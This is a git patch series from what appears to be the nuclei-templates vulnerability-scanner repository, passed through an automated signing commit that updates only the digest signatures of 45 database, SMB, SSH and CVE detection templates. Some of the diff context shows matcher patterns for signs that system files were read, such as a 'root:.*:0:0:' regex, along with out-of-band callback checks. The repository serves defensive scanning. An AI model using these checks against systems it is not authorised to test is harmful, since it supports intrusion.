javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 -javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff -javascript/detection/samba-detect.yaml:542324589cb7b9d34305c339d12350105050f250 -javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 -javascript/enumeration/checkpoint-firewall-enum.yaml:138f2fd977904d9c0b0ba4417077563babf22fbc -javascript/enumeration/ldap/ldap-metadata.yaml:c9a88f5ea1a7235863a9c1dc7a0b6d7280220854 +javascript/detection/oracle-tns-listener.yaml:bba4551124defe4dbd6ca7613426e951f5ad5c7b +javascript/detection/samba-detect.yaml:9e370170c601928c9b8d7e003696ca4f785e0fd6 +javascript/detection/ssh-auth-methods.yaml:5d9747b7181e9eef26185078b674f73c767fe079 +javascript/enumeration/checkpoint-firewall-enum.yaml:fd51dfe56269719666eab5c98192b7db36bdad68 +javascript/enumeration/ldap/ldap-metadata.yaml:05a27f84d4265c41836935525f69a8f05dbe2663 javascript/enumeration/minecraft-enum.yaml:86520064cf23ae09b9ce6a2ec23f29abaeb9eb5e -javascript/enumeration/mysql/mysql-default-login.yaml:6b496745946bfc4fbb85cba1c438a9825d3b9450 -javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b2ca3e -javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 -javascript/enumeration/mysql/mysql-show-variables.yaml:df67667eff109ba3b7c7a6062f98ae1065b0fc53 -javascript/enumeration/mysql/mysql-user-enum.yaml:58f73167aa8a07b54694c8e2e78c608e6d666de5 -javascript/enumeration/pgsql/pgsql-default-db.yaml:bfdb5c73b9c0c885a7b6292a154802361a4d6f66 -javascript/enumeration/pgsql/pgsql-file-read.yaml:d65ef75a6990d7314992aeac1b6d2e2df073f153 -javascript/enumeration/pgsql/pgsql-list-database.yaml:fb128c21ec8cbe65f1ef004de3ab62e6e6ae8064 -javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:8bd234e6f9c512295ee2f15ad131f08f61c4d297 -javascript/enumeration/pgsql/pgsql-list-users.yaml:ac9b613388f0b078365007258e4ba2a9345aba3c -javascript/enumeration/pgsql/pgsql-version-detect.yaml:eacb2b969556ed4ea5265a2519539632aed09a05 -javascript/enumeration/pop3/pop3-capabilities-enum.yaml:96878ec61ba4002050d1d7fd3cfb7f3b12aecf53 -javascript/enumeration/redis/redis-info.yaml:17c3e097148f2d246110091f046a266ecbf56fba -javascript/enumeration/redis/redis-require-auth.yaml:3d66c2357254969ae88da94c87b3a25817a34615 -javascript/enumeration/rsync/rsync-list-modules.yaml:fa56262f99d95be18083d7bd3a5202a34a00d125 -javascript/enumeration/rsync/rsync-version.yaml:30403f8400ce626131ddb8ff2d5091e9ef10184b -javascript/enumeration/smb/smb-default-creds.yaml:8313279ab65bc4163b5df3167ce192903fb60081 -javascript/enumeration/smb/smb-enum-domains.yaml:ecbda71db222935c0345880cb10679e04a4b9109 -javascript/enumeration/smb/smb-enum.yaml:7e98ef347ca7abf5e4d17d785a4da3ea22428dbf -javascript/enumeration/smb/smb-os-detect.yaml:faf30f5420ecd10098465a0e904c3b306c2ba2fd -javascript/enumeration/smb/smb-version-detect.yaml:9650e05b99a6110aa7e54e39d6a26607f10eaf46 -javascript/enumeration/smb/smb2-capabilities.yaml:0cb92b7102944cd985809983498b2aa3ac018932 -javascript/enumeration/smb/smb2-server-time.yaml:02c49b9754e2aeb423003c2e7fa7daca0d59e6c6 +javascript/enumeration/mysql/mysql-default-login.yaml:bcdf8851a245cc5be171ae783c13913cb09e433e +javascript/enumeration/mysql/mysql-info.yaml:0734a1e1e76a6c095b2ce7455c900d991bc90e73 +javascript/enumeration/mysql/mysql-show-databases.yaml:5a11b9d7be68ed60eeada8dccb934c1c01b4ecb3 +javascript/enumeration/mysql/mysql-show-variables.yaml:62a2339c9c7d5e316f5ddcb9015150f64ffdfc83 +javascript/enumeration/mysql/mysql-user-enum.yaml:3100c39a9fa862e6bfd3d25c16d570d9cf8478c0 +javascript/enumeration/pgsql/pgsql-default-db.yaml:38f113a54c8c3045cedc218f7364a3f84a379499 +javascript/enumeration/pgsql/pgsql-file-read.yaml:88047ed9410e773fcfa25699d50472b564dfb8ea +javascript/enumeration/pgsql/pgsql-list-database.yaml:7a9f013941ba7dfd4a8bab13fd1bf43017dbd9d5 +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:b4dbaaa48538af841b524fc3bfe06bef3f615fe0 +javascript/enumeration/pgsql/pgsql-list-users.yaml:9ac520a60e35c13eb8352dcc132a1303a4e29db7 +javascript/enumeration/pgsql/pgsql-version-detect.yaml:a5a800437f53099260c5c42b2c5ca8acab88b0f9 +javascript/enumeration/pop3/pop3-capabilities-enum.yaml:e9f3c2672835cb9957121930158fead0c492a234 +javascript/enumeration/redis/redis-info.yaml:8018676013089658062caa3b34bfa1436886debd +javascript/enumeration/redis/redis-require-auth.yaml:5c1e902ef817bb3386272f5e56ad35c7eabc3670 +javascript/enumeration/rsync/rsync-list-modules.yaml:f57ad0286243c14616e3f394d7ed42d71deaa085 +javascript/enumeration/rsync/rsync-version.yaml:284ec2be0fddd54e692fa817f1606b0ac9db2647 +javascript/enumeration/smb/smb-default-creds.yaml:97241c09af835f562f4a345a06d478b4d74d4a01 +javascript/enumeration/smb/smb-enum-domains.yaml:e2d93fb57a56cc6d69a8023c3f18a00fb7c2ee4d +javascript/enumeration/smb/smb-enum.yaml:4a06ae718b74844a0eecb34a62caaa835af7987f +javascript/enumeration/smb/smb-os-detect.yaml:6ff4e8e2de38dd9a0dbc0c20086bcc8e7bc3b376 +javascript/enumeration/smb/smb-version-detect.yaml:230c744f854ce4054cbccbd39f8159bdfc99e440 +javascript/enumeration/smb/smb2-capabilities.yaml:8619dcc3ce21261afc7622cdfdaa09bf27eba4ca +javascript/enumeration/smb/smb2-server-time.yaml:2e04fd11100689f78a7a5938728c183d7af9b958 javascript/enumeration/ssh/obsolete-ssh-version.yaml:136a52496c5832d06d80ced805951ab7be25dbff javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml:95c983ec5f5cec534007b5a252f53e5d764d8512 javascript/enumeration/ssh/ssh-password-auth.yaml:50ca5eb9f3fba26eb72d9510b71ac4fbad8b4698 javascript/enumeration/ssh/ssh-server-enumeration.yaml:4253ab5aaab4bc8690c29788d7f7b298aedca45e javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml:cf9e950c3f3200c8af9aeedeb35fc90f2eb5b1af -javascript/misconfiguration/mysql/mysql-empty-password.yaml:cfd87ddc706c406ed53ce45b6b222a63de6fa1a6 -javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:a140275437d2cc011fa13f90ee99c9b2de5d9cb9 -javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:bee66331a72b0eb35a58a0b14a6e3e6bd4933038 -javascript/misconfiguration/smb/smb-anonymous-access.yaml:07d8f92eac12b27c9918e52fb9771350b903338a -javascript/misconfiguration/smb/smb-shares.yaml:85fd832b448df9faf76106042a39fcd2fa1886f5 -javascript/misconfiguration/smb/smb-signing-not-required.yaml:b9bf642d551eaa58c612c6eac86d5ae87bb2835f +javascript/misconfiguration/mysql/mysql-empty-password.yaml:d74a916c9e6761d44187fb6adb8e37242203232b +javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:0d97931bfc914aaf9ee8170d169ef9561266be2f +javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:078a6097b77f365398233a8ede230f5ef521fd03 +javascript/misconfiguration/smb/smb-anonymous-access.yaml:279461b6960ab222ff019cb1bf295e547fd76227 +javascript/misconfiguration/smb/smb-shares.yaml:b78c0ddc814e0438b5f8a11e320b0418977c8da2 +javascript/misconfiguration/smb/smb-signing-not-required.yaml:9d89599c89b869a4ac68da96b27da3085b19b7e3 javascript/misconfiguration/ssh/ssh-cbc-mode-ciphers.yaml:cc5d0034e363156cfcb6efe1b982fae8f2d0fdd1 javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa047b0c844faaeadb9580b javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:1647b2fd0d49cd31fc77c4580f12f29b37620ad5 +javascript/udp/detection/tftp-detect.yaml:e6b1b530dc24c6a7926745ad46f4b93f5bb81a85 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 @@ -8863,7 +8863,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c2109ec252ab8d7eebab4e947e9f7c9640545085 +templates-checksum.txt:ec1f88dd84f3474d4bd8dec941b5f12f0f8614c4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8fd900c406519821ba7e984c990ce6972eb75a4c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 12:45:27 +0000 Subject: [PATCH 1081/1841] Auto Template Signing [Wed Jul 10 12:45:27 UTC 2024] :robot: --- javascript/audit/mysql/mysql-load-file.yaml | 2 +- javascript/backdoor/proftpd-backdoor.yaml | 2 +- javascript/cves/2012/CVE-2012-2122.yaml | 2 +- javascript/cves/2016/CVE-2016-8706.yaml | 2 +- javascript/cves/2019/CVE-2019-9193.yaml | 2 +- javascript/cves/2020/CVE-2020-7247.yaml | 2 +- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- javascript/cves/2023/CVE-2023-48795.yaml | 2 +- javascript/cves/2024/CVE-2024-23897.yaml | 2 +- javascript/default-logins/redis-default-logins.yaml | 2 +- javascript/detection/oracle-tns-listener.yaml | 2 +- javascript/detection/samba-detect.yaml | 2 +- javascript/detection/ssh-auth-methods.yaml | 2 +- javascript/enumeration/checkpoint-firewall-enum.yaml | 2 +- javascript/enumeration/ldap/ldap-metadata.yaml | 2 +- javascript/enumeration/mysql/mysql-default-login.yaml | 2 +- javascript/enumeration/mysql/mysql-info.yaml | 2 +- javascript/enumeration/mysql/mysql-show-databases.yaml | 2 +- javascript/enumeration/mysql/mysql-show-variables.yaml | 2 +- javascript/enumeration/mysql/mysql-user-enum.yaml | 2 +- javascript/enumeration/pgsql/pgsql-default-db.yaml | 2 +- javascript/enumeration/pgsql/pgsql-file-read.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-database.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-users.yaml | 2 +- javascript/enumeration/pgsql/pgsql-version-detect.yaml | 2 +- javascript/enumeration/pop3/pop3-capabilities-enum.yaml | 2 +- javascript/enumeration/redis/redis-info.yaml | 2 +- javascript/enumeration/redis/redis-require-auth.yaml | 2 +- javascript/enumeration/rsync/rsync-list-modules.yaml | 2 +- javascript/enumeration/rsync/rsync-version.yaml | 2 +- javascript/enumeration/smb/smb-default-creds.yaml | 2 +- javascript/enumeration/smb/smb-enum-domains.yaml | 2 +- javascript/enumeration/smb/smb-enum.yaml | 2 +- javascript/enumeration/smb/smb-os-detect.yaml | 2 +- javascript/enumeration/smb/smb-version-detect.yaml | 2 +- javascript/enumeration/smb/smb2-capabilities.yaml | 2 +- javascript/enumeration/smb/smb2-server-time.yaml | 2 +- javascript/misconfiguration/mysql/mysql-empty-password.yaml | 2 +- javascript/misconfiguration/pgsql/pgsql-empty-password.yaml | 2 +- javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml | 2 +- javascript/misconfiguration/smb/smb-anonymous-access.yaml | 2 +- javascript/misconfiguration/smb/smb-shares.yaml | 2 +- javascript/misconfiguration/smb/smb-signing-not-required.yaml | 2 +- javascript/udp/detection/tftp-detect.yaml | 2 +- 45 files changed, 45 insertions(+), 45 deletions(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index 4d02114000..7b79ec8dd4 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -58,4 +58,4 @@ javascript: part: response json: - .Rows[] -# digest: 4b0a00483046022100907d860204e982df899d9b32c76da23e00fdc18883029567f173190cd5ed7421022100ca703635c58c61a43a8c473060117cb60312849b2a2037b1c48828dd3c350a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100abcc3dba9d8ad8d8b9814f9a26fa4c4a2e3092998c466b6b92f7f9899a738e40022100f9ac346fa40811738f00b7966e7a747efb702ef048072946b4b037fae8d9633b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml index 0565b6dec5..547bddb5ad 100644 --- a/javascript/backdoor/proftpd-backdoor.yaml +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -48,4 +48,4 @@ javascript: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100d2d663cb9e52250ca905fdb6805184792d4b8ab35c1412e3927ba47d8d96d38c0220322ec25f04957d4ca281cb2facf5c8f0938ef3f613a27e50d45e790b5f6f9e80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb82a217b67498139c709562bd0f21f865658f6d4a27ef4e3d8a86886323865202202ffeb3c9273386c04f21a49024b4f3584dd5532fc3ad238e5c669b9d47025825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2012/CVE-2012-2122.yaml b/javascript/cves/2012/CVE-2012-2122.yaml index 9226beb40e..d75470944e 100644 --- a/javascript/cves/2012/CVE-2012-2122.yaml +++ b/javascript/cves/2012/CVE-2012-2122.yaml @@ -63,4 +63,4 @@ javascript: part: response json: - .Rows[] | .Database -# digest: 4a0a00473045022100c26d1d65fc8d4768d00e7b623053892d02e9a1f7e60b93f23a3436d3123a9a8302205ccf5fb752cc61f379b072827692e6e15b5133d50e463c265f4a01c3e2c5ab48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207fa11d2a7dbb88837eb0ae592716b8a335a68e751bf3d72680406af18e40e484022100ba836bfec0daf4f5dd1cdfa594c59a8f139e7289c66b9bf49bc0e529a6a9b903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml index 1fb22d6a0d..ea99029d4c 100644 --- a/javascript/cves/2016/CVE-2016-8706.yaml +++ b/javascript/cves/2016/CVE-2016-8706.yaml @@ -57,4 +57,4 @@ javascript: words: - "Auth failure" negative: true -# digest: 490a0046304402202b779e50c06772457c979559413b9c9ed1174a52656ee40abb96ea3a6fad1dc4022051980afb07dd370ab8740389b2a2fd654ee21d9e3534428f834520a9f47cab79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d530ec07154a983e51429b70c966e0479cf23a632a8774c3a3571aaa0d5801b20221009d852686cc74fbc1b375c6492ee8121bf7fb25b9f89848db650b67ed480f225b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml index b7d4130a42..93fecb786b 100644 --- a/javascript/cves/2019/CVE-2019-9193.yaml +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -54,4 +54,4 @@ javascript: - type: word words: - "cmd_output" -# digest: 490a0046304402203bf60f10b4870b778c83d7edccecdda132a7b45138266bc0f042dece1844d7a4022060f11ae12de13cc9a4965bbcaf775ad819d5cf42e17674066eddc953f3e0c8f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8b3052629198dc59c7017eb410afa0d581b1f53d1afec0bfc04d13af2576f9202204df99e66e1a330c0c0610ac118e619934c2b12383fde211ed44714867251a451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2020/CVE-2020-7247.yaml b/javascript/cves/2020/CVE-2020-7247.yaml index b4f440fb83..bf5daf5e34 100644 --- a/javascript/cves/2020/CVE-2020-7247.yaml +++ b/javascript/cves/2020/CVE-2020-7247.yaml @@ -60,4 +60,4 @@ javascript: - success == true # - response == true condition: and -# digest: 490a00463044022021d4139a0bbca1a3d13ac91b61b1d6ca74275652766a94ad84661508633fae1a02200c6c5179ee315dae6b48fce051343f6eb2152cf90a5dbfa7d25b2636416cf3c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047f218b487b497e0dc916e79030fbbe3b552550fc3147ede62cb75ee59bc9b3c022100d66c5aba9423fa9bc275699ef6ded125804fa32889a15038d0196d16806f270b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 57c49474b6..5f809332c6 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -66,4 +66,4 @@ javascript: - 'contains(interactsh_protocol, "dns")' - 'contains(interactsh_request, response)' condition: and -# digest: 4b0a00483046022100a561894c748437dfc21d9f751262302cd1f04eb3b75eb625dbac3aa4a625f8ba022100bb13779e8ed570a786808de9e2ce24a0699e0b6d4bb8cc0b9c800da5b8c9f94d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057e01ef1d30cc0a70e849e0c6fe4e8e3fbbec9965b3c00043d531726b6b2f8ca022100818d0bfc74f0746cf459838fd25f78d7b518025f549b30bb5998476e890301a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2023/CVE-2023-48795.yaml b/javascript/cves/2023/CVE-2023-48795.yaml index d28618fffb..51087a88d5 100644 --- a/javascript/cves/2023/CVE-2023-48795.yaml +++ b/javascript/cves/2023/CVE-2023-48795.yaml @@ -98,4 +98,4 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a004830460221008e3aaef0c248143a9110a18d806d905fd9eefb8e47416623e07ee050de14e21e022100e823b96f5497b56174c9c126260a98c0f8ed6adb88e9e2a84628a3b0d0b82496:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9caf36474d3f9b1c9260be0e0bf169ba7c00aca9d49fedabdbf81193b8f152c022029be5e05d5a08d42157378cafa56eac3ae3cdbf124facab744d572e45f347f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index ad32e1e79a..62f37481b9 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -60,4 +60,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 490a00463044022010e3abe8db41dd11a49e2de1ae55690d52acc7121430f1ea387af8b37ed6b48f02205d3facc7b2f09bbcd0ad7d0e1850797639312d1a980f35bb7b0bab638ab23200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206177320674364c9d4ca08784b566ee26f51797e931f44e2344b29753e9eb7f4f02200b80670626fb457ae4142d6b191740d2c0e7d499b6a08f246a375ddd7abc4e86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/default-logins/redis-default-logins.yaml b/javascript/default-logins/redis-default-logins.yaml index 930f643a0f..dfba4204cd 100644 --- a/javascript/default-logins/redis-default-logins.yaml +++ b/javascript/default-logins/redis-default-logins.yaml @@ -52,4 +52,4 @@ javascript: negative: true words: - "redis_mode:sentinel" -# digest: 4b0a00483046022100ff75ba65990fca927757dbae5daa405398bb1dbcae6b24d63b6b1ba6a1004eac022100e6d2d878db82f6b6cd0da22b3e0ad27c566cfd43418816c944155e1bf3930b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a877c50a02d8cf0352dd75792350050a664d4bd5d6b8c456604e493044d33190022043f376210ce1b9ff19eb2de3d21465031df88680722ff767dc8ac0413a8729b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/detection/oracle-tns-listener.yaml b/javascript/detection/oracle-tns-listener.yaml index 887a289c3d..be06f6960a 100644 --- a/javascript/detection/oracle-tns-listener.yaml +++ b/javascript/detection/oracle-tns-listener.yaml @@ -30,4 +30,4 @@ javascript: name: Version regex: - 'Oracle TNS Listener Version:([0-9.]+)' -# digest: 4b0a00483046022100c9e955483b07b5e6c206b947b067351b63dfce6eec79e8cc9d7e15d1549566de022100c120e8eabbf1f23df1d9dc19e677b8a574b3b11fbf233918527afdf5c635f117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096e0528367510168d0aef24b208ea2296b9838d160bcd78fcfc51017eaf78a44022100a292553d38123042dbb8e3ac5df730b5972eb5f94e14b62b1ff74ed2abac175b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/detection/samba-detect.yaml b/javascript/detection/samba-detect.yaml index e88d83ed16..b017dfbc42 100644 --- a/javascript/detection/samba-detect.yaml +++ b/javascript/detection/samba-detect.yaml @@ -42,4 +42,4 @@ javascript: - type: dsl dsl: - response -# digest: 490a00463044022012d38799511e5a613e4973225e899ed9195e565f2f1fb07e37bfcbcab76f3cb4022017092c128bc5afc71916ffe910021bf1c88a130598e8f70af252bd85d1fb55cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9ef60961c5a5cc50e337d1d612f75f49065ddbae4b5428678c012873299a82202206ca222dae50bd0f55a7da4862c4d5d07fd6c3714f69b04cc4c0d6939920c1465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/detection/ssh-auth-methods.yaml b/javascript/detection/ssh-auth-methods.yaml index 000e98ed99..4bebea04bc 100644 --- a/javascript/detection/ssh-auth-methods.yaml +++ b/javascript/detection/ssh-auth-methods.yaml @@ -29,4 +29,4 @@ javascript: - type: json json: - '.UserAuth' -# digest: 4b0a00483046022100e442be80dad13e6129777b4894e194eacd4b5eb3dd0e9cf00e0ec1cf57bc5db702210092d14d2ffb90731bdbf6c3614bf1b0728d6b00d7a5f1ee4f7b6b42575de66309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0e4202900ecbf8db38eebe76a699cc1fbf5eb04a774de69c89ca027cd877d9d02202d1ea9b051c206ec5a34aa78b45973bdef80120d71c468aaf6a12c9a87f8609d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 13a383d839..0060975b3f 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -38,4 +38,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a004730450220108fbebe4fc61b2b639e87583c81ecb8f5627def71c928e8ffffd9dd7fe23124022100e01a80e62209a106fbc669e78c191939d02de4d149336432cabe8ecb29736716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c2179f51fcc485b5f371005520838e896215c9db07f17b3cdd5629b6e23a75302210095ebdb685ac691e1908148cb7986319255d466649ed49c9617a233faef337fc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/ldap/ldap-metadata.yaml b/javascript/enumeration/ldap/ldap-metadata.yaml index 65c2229624..42eb48d3e3 100644 --- a/javascript/enumeration/ldap/ldap-metadata.yaml +++ b/javascript/enumeration/ldap/ldap-metadata.yaml @@ -42,4 +42,4 @@ javascript: - '"DomainFunctionality: "+ .DomainFunctionality' - '"ForestFunctionality: " + .ForestFunctionality' - '"DomainControllerFunctionality: "+ .DomainControllerFunctionality' -# digest: 4a0a0047304502201a7f8d1aac1b3310c350f97cfc2da7ee0c35031a8c190f60cf53d13205487b94022100922fe954b1f34d7c2cebe82aacc313bf609ed3259c819b989e32c20fc4cf80e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c979fbb9dd9497508e76e1ac54c24d496263ea7f115d00581f514e1cf56a5b3022025e707947e35b5533fa1b01483f4e3553338775cda2389549a12145dc1c60873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 393a6d9828..4665e1f88a 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -46,4 +46,4 @@ javascript: - "response == true" - "success == true" condition: and -# digest: 4a0a00473045022078a7e5184633aa4027b1491303db9a9c04648c06ceb9a659406418cc10cafbfb022100e2b6a8b51554726af7594d2be7f24a4850ecaa0c5c72705da830fb5ae5003139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b16c0831093780883fc023d676c54ec2533d4ac05f2071bea5d68c33ca8b63002210092abea71a11967719f8565e6fc01a8e49569bd807e9cc5b80192f8011c456d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml index 7cfcce89d3..ba567ca3ce 100644 --- a/javascript/enumeration/mysql/mysql-info.yaml +++ b/javascript/enumeration/mysql/mysql-info.yaml @@ -37,4 +37,4 @@ javascript: - '"Version: "+ .Version ' - '"TLS "+ .TLS' - '"Transport: "+ .Transport ' -# digest: 490a00463044022067b8de52cbfdb1154c1292e4632eb87eeba83eec70d708fc18bbd690fe8e88780220692ad8258922bc21e9bfc4a9c57e0aa6929d04ee7582f22e8045540b4f01614e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009be5b156071a03d67fed95337ba696d9dcc9e8890fa460fae66a3b660b37f19d02204c0b4711cd08b8accea895779b0edae1c77426925850e2004acbb5a95f41c730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml index 2612165a37..5ae5750680 100644 --- a/javascript/enumeration/mysql/mysql-show-databases.yaml +++ b/javascript/enumeration/mysql/mysql-show-databases.yaml @@ -51,4 +51,4 @@ javascript: part: response json: - .Rows[] | .Database -# digest: 4a0a00473045022052bef740c486c4e0ccf7cc5e07231a1213e07b8ba149919e02f29e53ecebcb01022100bd4ac59dbc20f84f9ae5f8dba3f183756df56d2fa17a3bab7ea014631f4b2a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202563a2452c93e9c0bd70cade15e7796d5ae57b417a1eb2b9a033376334757bff02200e6107069bad9ac71cbf78d57c46be60338e0bf242b93dc37ba0fa343fcefb67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml index e8c453f63f..c027443207 100644 --- a/javascript/enumeration/mysql/mysql-show-variables.yaml +++ b/javascript/enumeration/mysql/mysql-show-variables.yaml @@ -52,4 +52,4 @@ javascript: part: response json: - '.Rows[].Variable_name' -# digest: 4b0a00483046022100db436fe9a644606ceaf3582c9060b533f3f19ccda67d48c3cda59e170ae1629d022100dcfdda5829b1cc31ff924d1274611b3103cc6360b51fa7885da45c93b06ddd8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc50eb6ec626073ea417f99bb6d61f8f62fdc9643354c55ae28802a88147c01e022029c394f827e7c03dd02c03fc7c17fc2a4c894c55566bf2b858cc21c8af4067b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml index 2c38ea218b..49b4a2b3d9 100644 --- a/javascript/enumeration/mysql/mysql-user-enum.yaml +++ b/javascript/enumeration/mysql/mysql-user-enum.yaml @@ -54,4 +54,4 @@ javascript: part: response json: - '.Rows[].user' -# digest: 490a0046304402201f2b78e710a32bd67599c550c546dfa7b53c09dfa8ce014a471c1c9f5d4b6a4b0220086ae8fbbf4e7350f8f5814706b203e63e1d6cfaa814f4017baa791f93406d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 